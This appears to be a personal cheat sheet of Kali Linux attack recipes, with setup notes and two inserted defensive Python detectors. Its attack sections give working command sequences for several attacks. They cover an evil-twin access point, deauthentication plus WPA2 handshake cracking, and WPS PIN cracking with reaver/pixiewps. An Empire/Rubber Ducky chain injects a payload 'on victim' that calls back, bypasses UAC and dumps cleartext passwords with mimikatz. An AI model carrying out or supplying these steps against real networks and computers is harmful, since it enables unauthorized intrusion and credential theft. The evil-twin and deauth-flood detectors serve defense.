Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP

  • airbase-ng -c 11 -a 20:34:67:24:89:76 -e FakeAP -v -z 2 wlan0mon

Create Evil Twin AP

  • airbase-ng -a [victim AP MAC] -c 11 -Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP

  • airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rogueap

DeAuth clients on victim AP

  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon

Crack captured handshake (-w is a file prefix, so the capture is written as rogueap-01.cap)

  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt /root/Desktop/rogueap-01.cap
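As an added example (not part of the original notes), the monitoring step above can be turned into a check from the defender's side: airodump-ng's CSV output (`-w` also writes a `-01.csv` file) lists every BSSID that advertises a given ESSID, so a second BSSID serving your network name, especially an open one next to a WPA2 one, is the evil-twin signature. The sample CSV text and the `TRUSTED_BSSIDS` allowlist below are constructed; the column layout follows airodump-ng's CSV tables.

```python
import csv
from collections import defaultdict

# Constructed sample in the airodump-ng CSV layout (not a real capture).
# Two entries advertise "VictimAP": the real AP (WPA2) and a second BSSID
# that serves the same name without encryption, the evil-twin signature.
SAMPLE_CSV = (
    "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, "
    "Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\n"
    "20:34:67:24:89:76, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, "
    "WPA2, CCMP, PSK, -41, 120, 0, 0. 0. 0. 0, 8, VictimAP, \n"
    "00:11:22:33:44:55, 2024-01-01 10:03:00, 2024-01-01 10:05:00, 11, 54, "
    "OPN, , , -35, 60, 0, 0. 0. 0. 0, 8, VictimAP, \n"
    "AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, "
    "WPA2, CCMP, PSK, -60, 110, 0, 0. 0. 0. 0, 9, OtherNet, \n"
    "\n"
    "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, "
    "Probed ESSIDs\n"
    "40:A6:D9:1F:4A:D3, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50, 40, "
    "20:34:67:24:89:76, VictimAP\n"
)

# Constructed allowlist: BSSIDs of the access points we actually operate.
TRUSTED_BSSIDS = frozenset({"20:34:67:24:89:76"})


def parse_access_points(text):
    """Return the access-point rows of airodump-ng CSV text as dicts.

    airodump-ng writes two tables separated by a blank line: access points
    first, then stations. Only the first table is parsed here.
    """
    ap_block = text.split("\n\n", 1)[0]
    rows = csv.reader(ap_block.splitlines(), skipinitialspace=True)
    header = [h.strip() for h in next(rows)]
    aps = []
    for row in rows:
        if len(row) < len(header):
            continue  # truncated line (airodump-ng may still be writing)
        aps.append({k: v.strip() for k, v in zip(header, row)})
    return aps


def find_evil_twin_candidates(aps, trusted_bssids=frozenset()):
    """Group APs by ESSID and report names served by more than one BSSID.

    Every BSSID outside the trusted list that shares an ESSID with another
    BSSID is reported, with the reasons that make it stand out.
    """
    by_essid = defaultdict(list)
    for ap in aps:
        if ap["ESSID"]:  # hidden networks carry an empty name; skip them
            by_essid[ap["ESSID"]].append(ap)

    findings = []
    for essid, group in by_essid.items():
        if len({ap["BSSID"] for ap in group}) < 2:
            continue
        for ap in group:
            if ap["BSSID"] in trusted_bssids:
                continue
            reasons = ["ESSID %r also advertised by %d other BSSID(s)"
                       % (essid, len(group) - 1)]
            if trusted_bssids:
                reasons.append("BSSID not in trusted list")
            peer_privacy = {p["Privacy"] for p in group if p is not ap}
            if ap["Privacy"] == "OPN" and peer_privacy - {"OPN"}:
                reasons.append("open network cloning an encrypted one")
            findings.append({"essid": essid, "bssid": ap["BSSID"],
                             "channel": ap["channel"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_evil_twin_candidates(parse_access_points(SAMPLE_CSV),
                                       TRUSTED_BSSIDS):
        print("suspect %(bssid)s on ch %(channel)s for %(essid)r: %(reasons)s" % f)
```

Run against a live `-01.csv` by reading the file instead of `SAMPLE_CSV`; without a trusted list both BSSIDs of a duplicated ESSID are reported, so maintaining the allowlist is what separates "our second AP on another channel" from a rogue.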

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill (if the wifi interface doesn’t show up correctly)
  2. Start wifi interface
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake wlan0mon
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake wlan0mon (alternative method; -w is a file prefix, so the capture lands in /root/Desktop/wpa2handshake-01.cap)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3 (client MAC address) wlan0mon
    2. Wait for handshake to be captured
  6. Crack handshake
    1. # aircrack-ng -a 2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
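The deauth step (here and in the Evil Twin section above) is what a wireless IDS keys on: a client receiving dozens of deauthentication frames within a second is not normal roaming. As an added example that is not part of the original notes, a sliding-window detector over a constructed frame log; the `FRAMES` list, the MAC addresses and the `threshold` default are all constructed, and a real deployment would feed it frames decoded from a monitor-mode capture.

```python
from collections import defaultdict, deque

AP = "20:34:67:24:89:76"          # constructed router BSSID
VICTIM = "40:A6:D9:1F:4A:D3"      # constructed client MAC
OTHER = "AA:BB:CC:DD:EE:FF"       # constructed second client

# Constructed frame log (not a real capture): (time_s, subtype, bssid, client).
# Ordinary beacons and one lone deauth are mixed with a burst of 12 deauth
# frames to VICTIM inside half a second.
FRAMES = (
    [(i * 0.1, "beacon", AP, "ff:ff:ff:ff:ff:ff") for i in range(40)]
    + [(0.2 + i * 0.04, "deauth", AP, VICTIM) for i in range(12)]
    + [(3.0, "deauth", AP, OTHER)]
)


def detect_deauth_bursts(frames, window_s=1.0, threshold=10):
    """Flag (bssid, client) pairs that receive at least `threshold`
    deauth/disassoc frames inside any sliding window of `window_s` seconds.

    One alert is raised per pair, at the frame that crosses the threshold,
    so a long flood does not produce one alert per frame.
    """
    recent = defaultdict(deque)   # (bssid, client) -> timestamps in window
    alerted = set()
    alerts = []
    for t, subtype, bssid, client in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        key = (bssid, client)
        window = recent[key]
        window.append(t)
        while t - window[0] > window_s:   # drop timestamps outside the window
            window.popleft()
        if len(window) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": bssid, "client": client,
                           "count": len(window), "window_start": window[0]})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_bursts(FRAMES):
        print("deauth burst: %(count)d frames from %(bssid)s to %(client)s "
              "starting at t=%(window_start).2fs" % a)
```

The single deauth to `OTHER` never trips the detector, which is the point of rate-based rather than presence-based alerting: legitimate APs do send the odd deauth, floods are the anomaly.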

Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4d. (Empire: agents) > interact FSDFSGAJ34FGH4
4e. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4f. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4g. (Empire: privesc/bypassuac ) > set Listener Listener01
4h. (Empire: privesc/bypassuac ) > run
4i. (Empire: privesc/bypassuac ) > back (twice)
4j. (Empire: agents) > list
4k. (Empire: agents) > interact DSGHFDFSGHJ243J
4l. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
4m. (Empire: credentials/mimikatz/logonpasswords ) > run

If successful, logon passwords are now revealed in
cleartext :)

Tor + proxychains + Kali

  1. Update Kali
    1. apt-get update
  2. Configure apt sources
    1. leafpad /etc/apt/sources.list
      1. add ‘deb wheezy main’
  3. Install Tor gpg keys
    1. gpg --keyserver --recv 886DDD89
    2. gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
    3. apt-get update
    4. apt-get install
  4. Install Tor
    1. apt-get install tor
  5. Configure proxychains
    1. leafpad /etc/proxychains.conf
      1. uncomment ‘dynamic_chain’
      2. comment out ‘static_chain’
      3. add ‘socks5 9050’ at the end of the file
  6. Start Tor
    1. service tor start
  7. Execute proxychains
    1. proxychains nmap

Aircrack-ng + reaver + pixiewps


  • Kali Linux
  • Run “apt-get update && apt-get dist-upgrade -y” on your Kali Linux machine

1) Install reaver

root@kali:~# apt-get install reaver aircrack-ng

2) Put your interface in monitor mode:

root@kali:~# airmon-ng start wlan0

Note: You should now have a monitor interface named ‘wlan0mon’

3) Identify AP in-scope for testing

root@kali:~# airodump-ng wlan0mon --wps

Note: Identify the in-scope AP’s MAC address (BSSID) and the channel it runs on

4) Run reaver with gathered info

root@kali:~# reaver -i wlan0mon -c 11 -b 12:34:56:78:90:12 -K 1

5) Behold pixiewps magic

You’re presented with the WPS PSK within seconds, thanks Kali, reaver & pixiewps …that’s what I call an alliance of power

Scripts :: Kali


KAAISv3 by rawstring

  • wget v4.3 by peterubuntu10

  • wget

Lazy Kali

  • wget
  • wget by

  • svn checkout phillips321 by Lee Baird

  • git clone

1st setup :: Kali


Correct sources.list

nano /etc/apt/sources.list
add following to sources.list:

Regular repos
deb kali main non-free contrib
deb kali/updates main contrib non-free

Bleeding Edge repos
deb kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
2. mount VBoxAdditions package
3. copy install package to /tmp
4. chmod 755 /tmp/
5. ./
6. logout or reboot guest machine


  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot


Kali Pi :: Initial Setup



[Static IP]
nano /etc/network/interfaces

Add the following lines at the bottom of the file (comment out the lines above, except the loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static

[DNS Conf]
nano /etc/resolv.conf

[Assign static default gateway]
ip route add default via

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status


– TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]

– Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable


Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable

XFCE on Kali


apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies

Configure default x-session mngr
update-alternatives --config x-session-manager

To remove XFCE again:
apt-get remove xfce4 xfce4-places-plugin xfce4-goodies

Fix “Warning: gnome-keyring…” error
Edit /etc/xdg/autostart/gnome-keyring-pkcs11.desktop
and add ‘XFCE’ at the end of the OnlyShowIn line.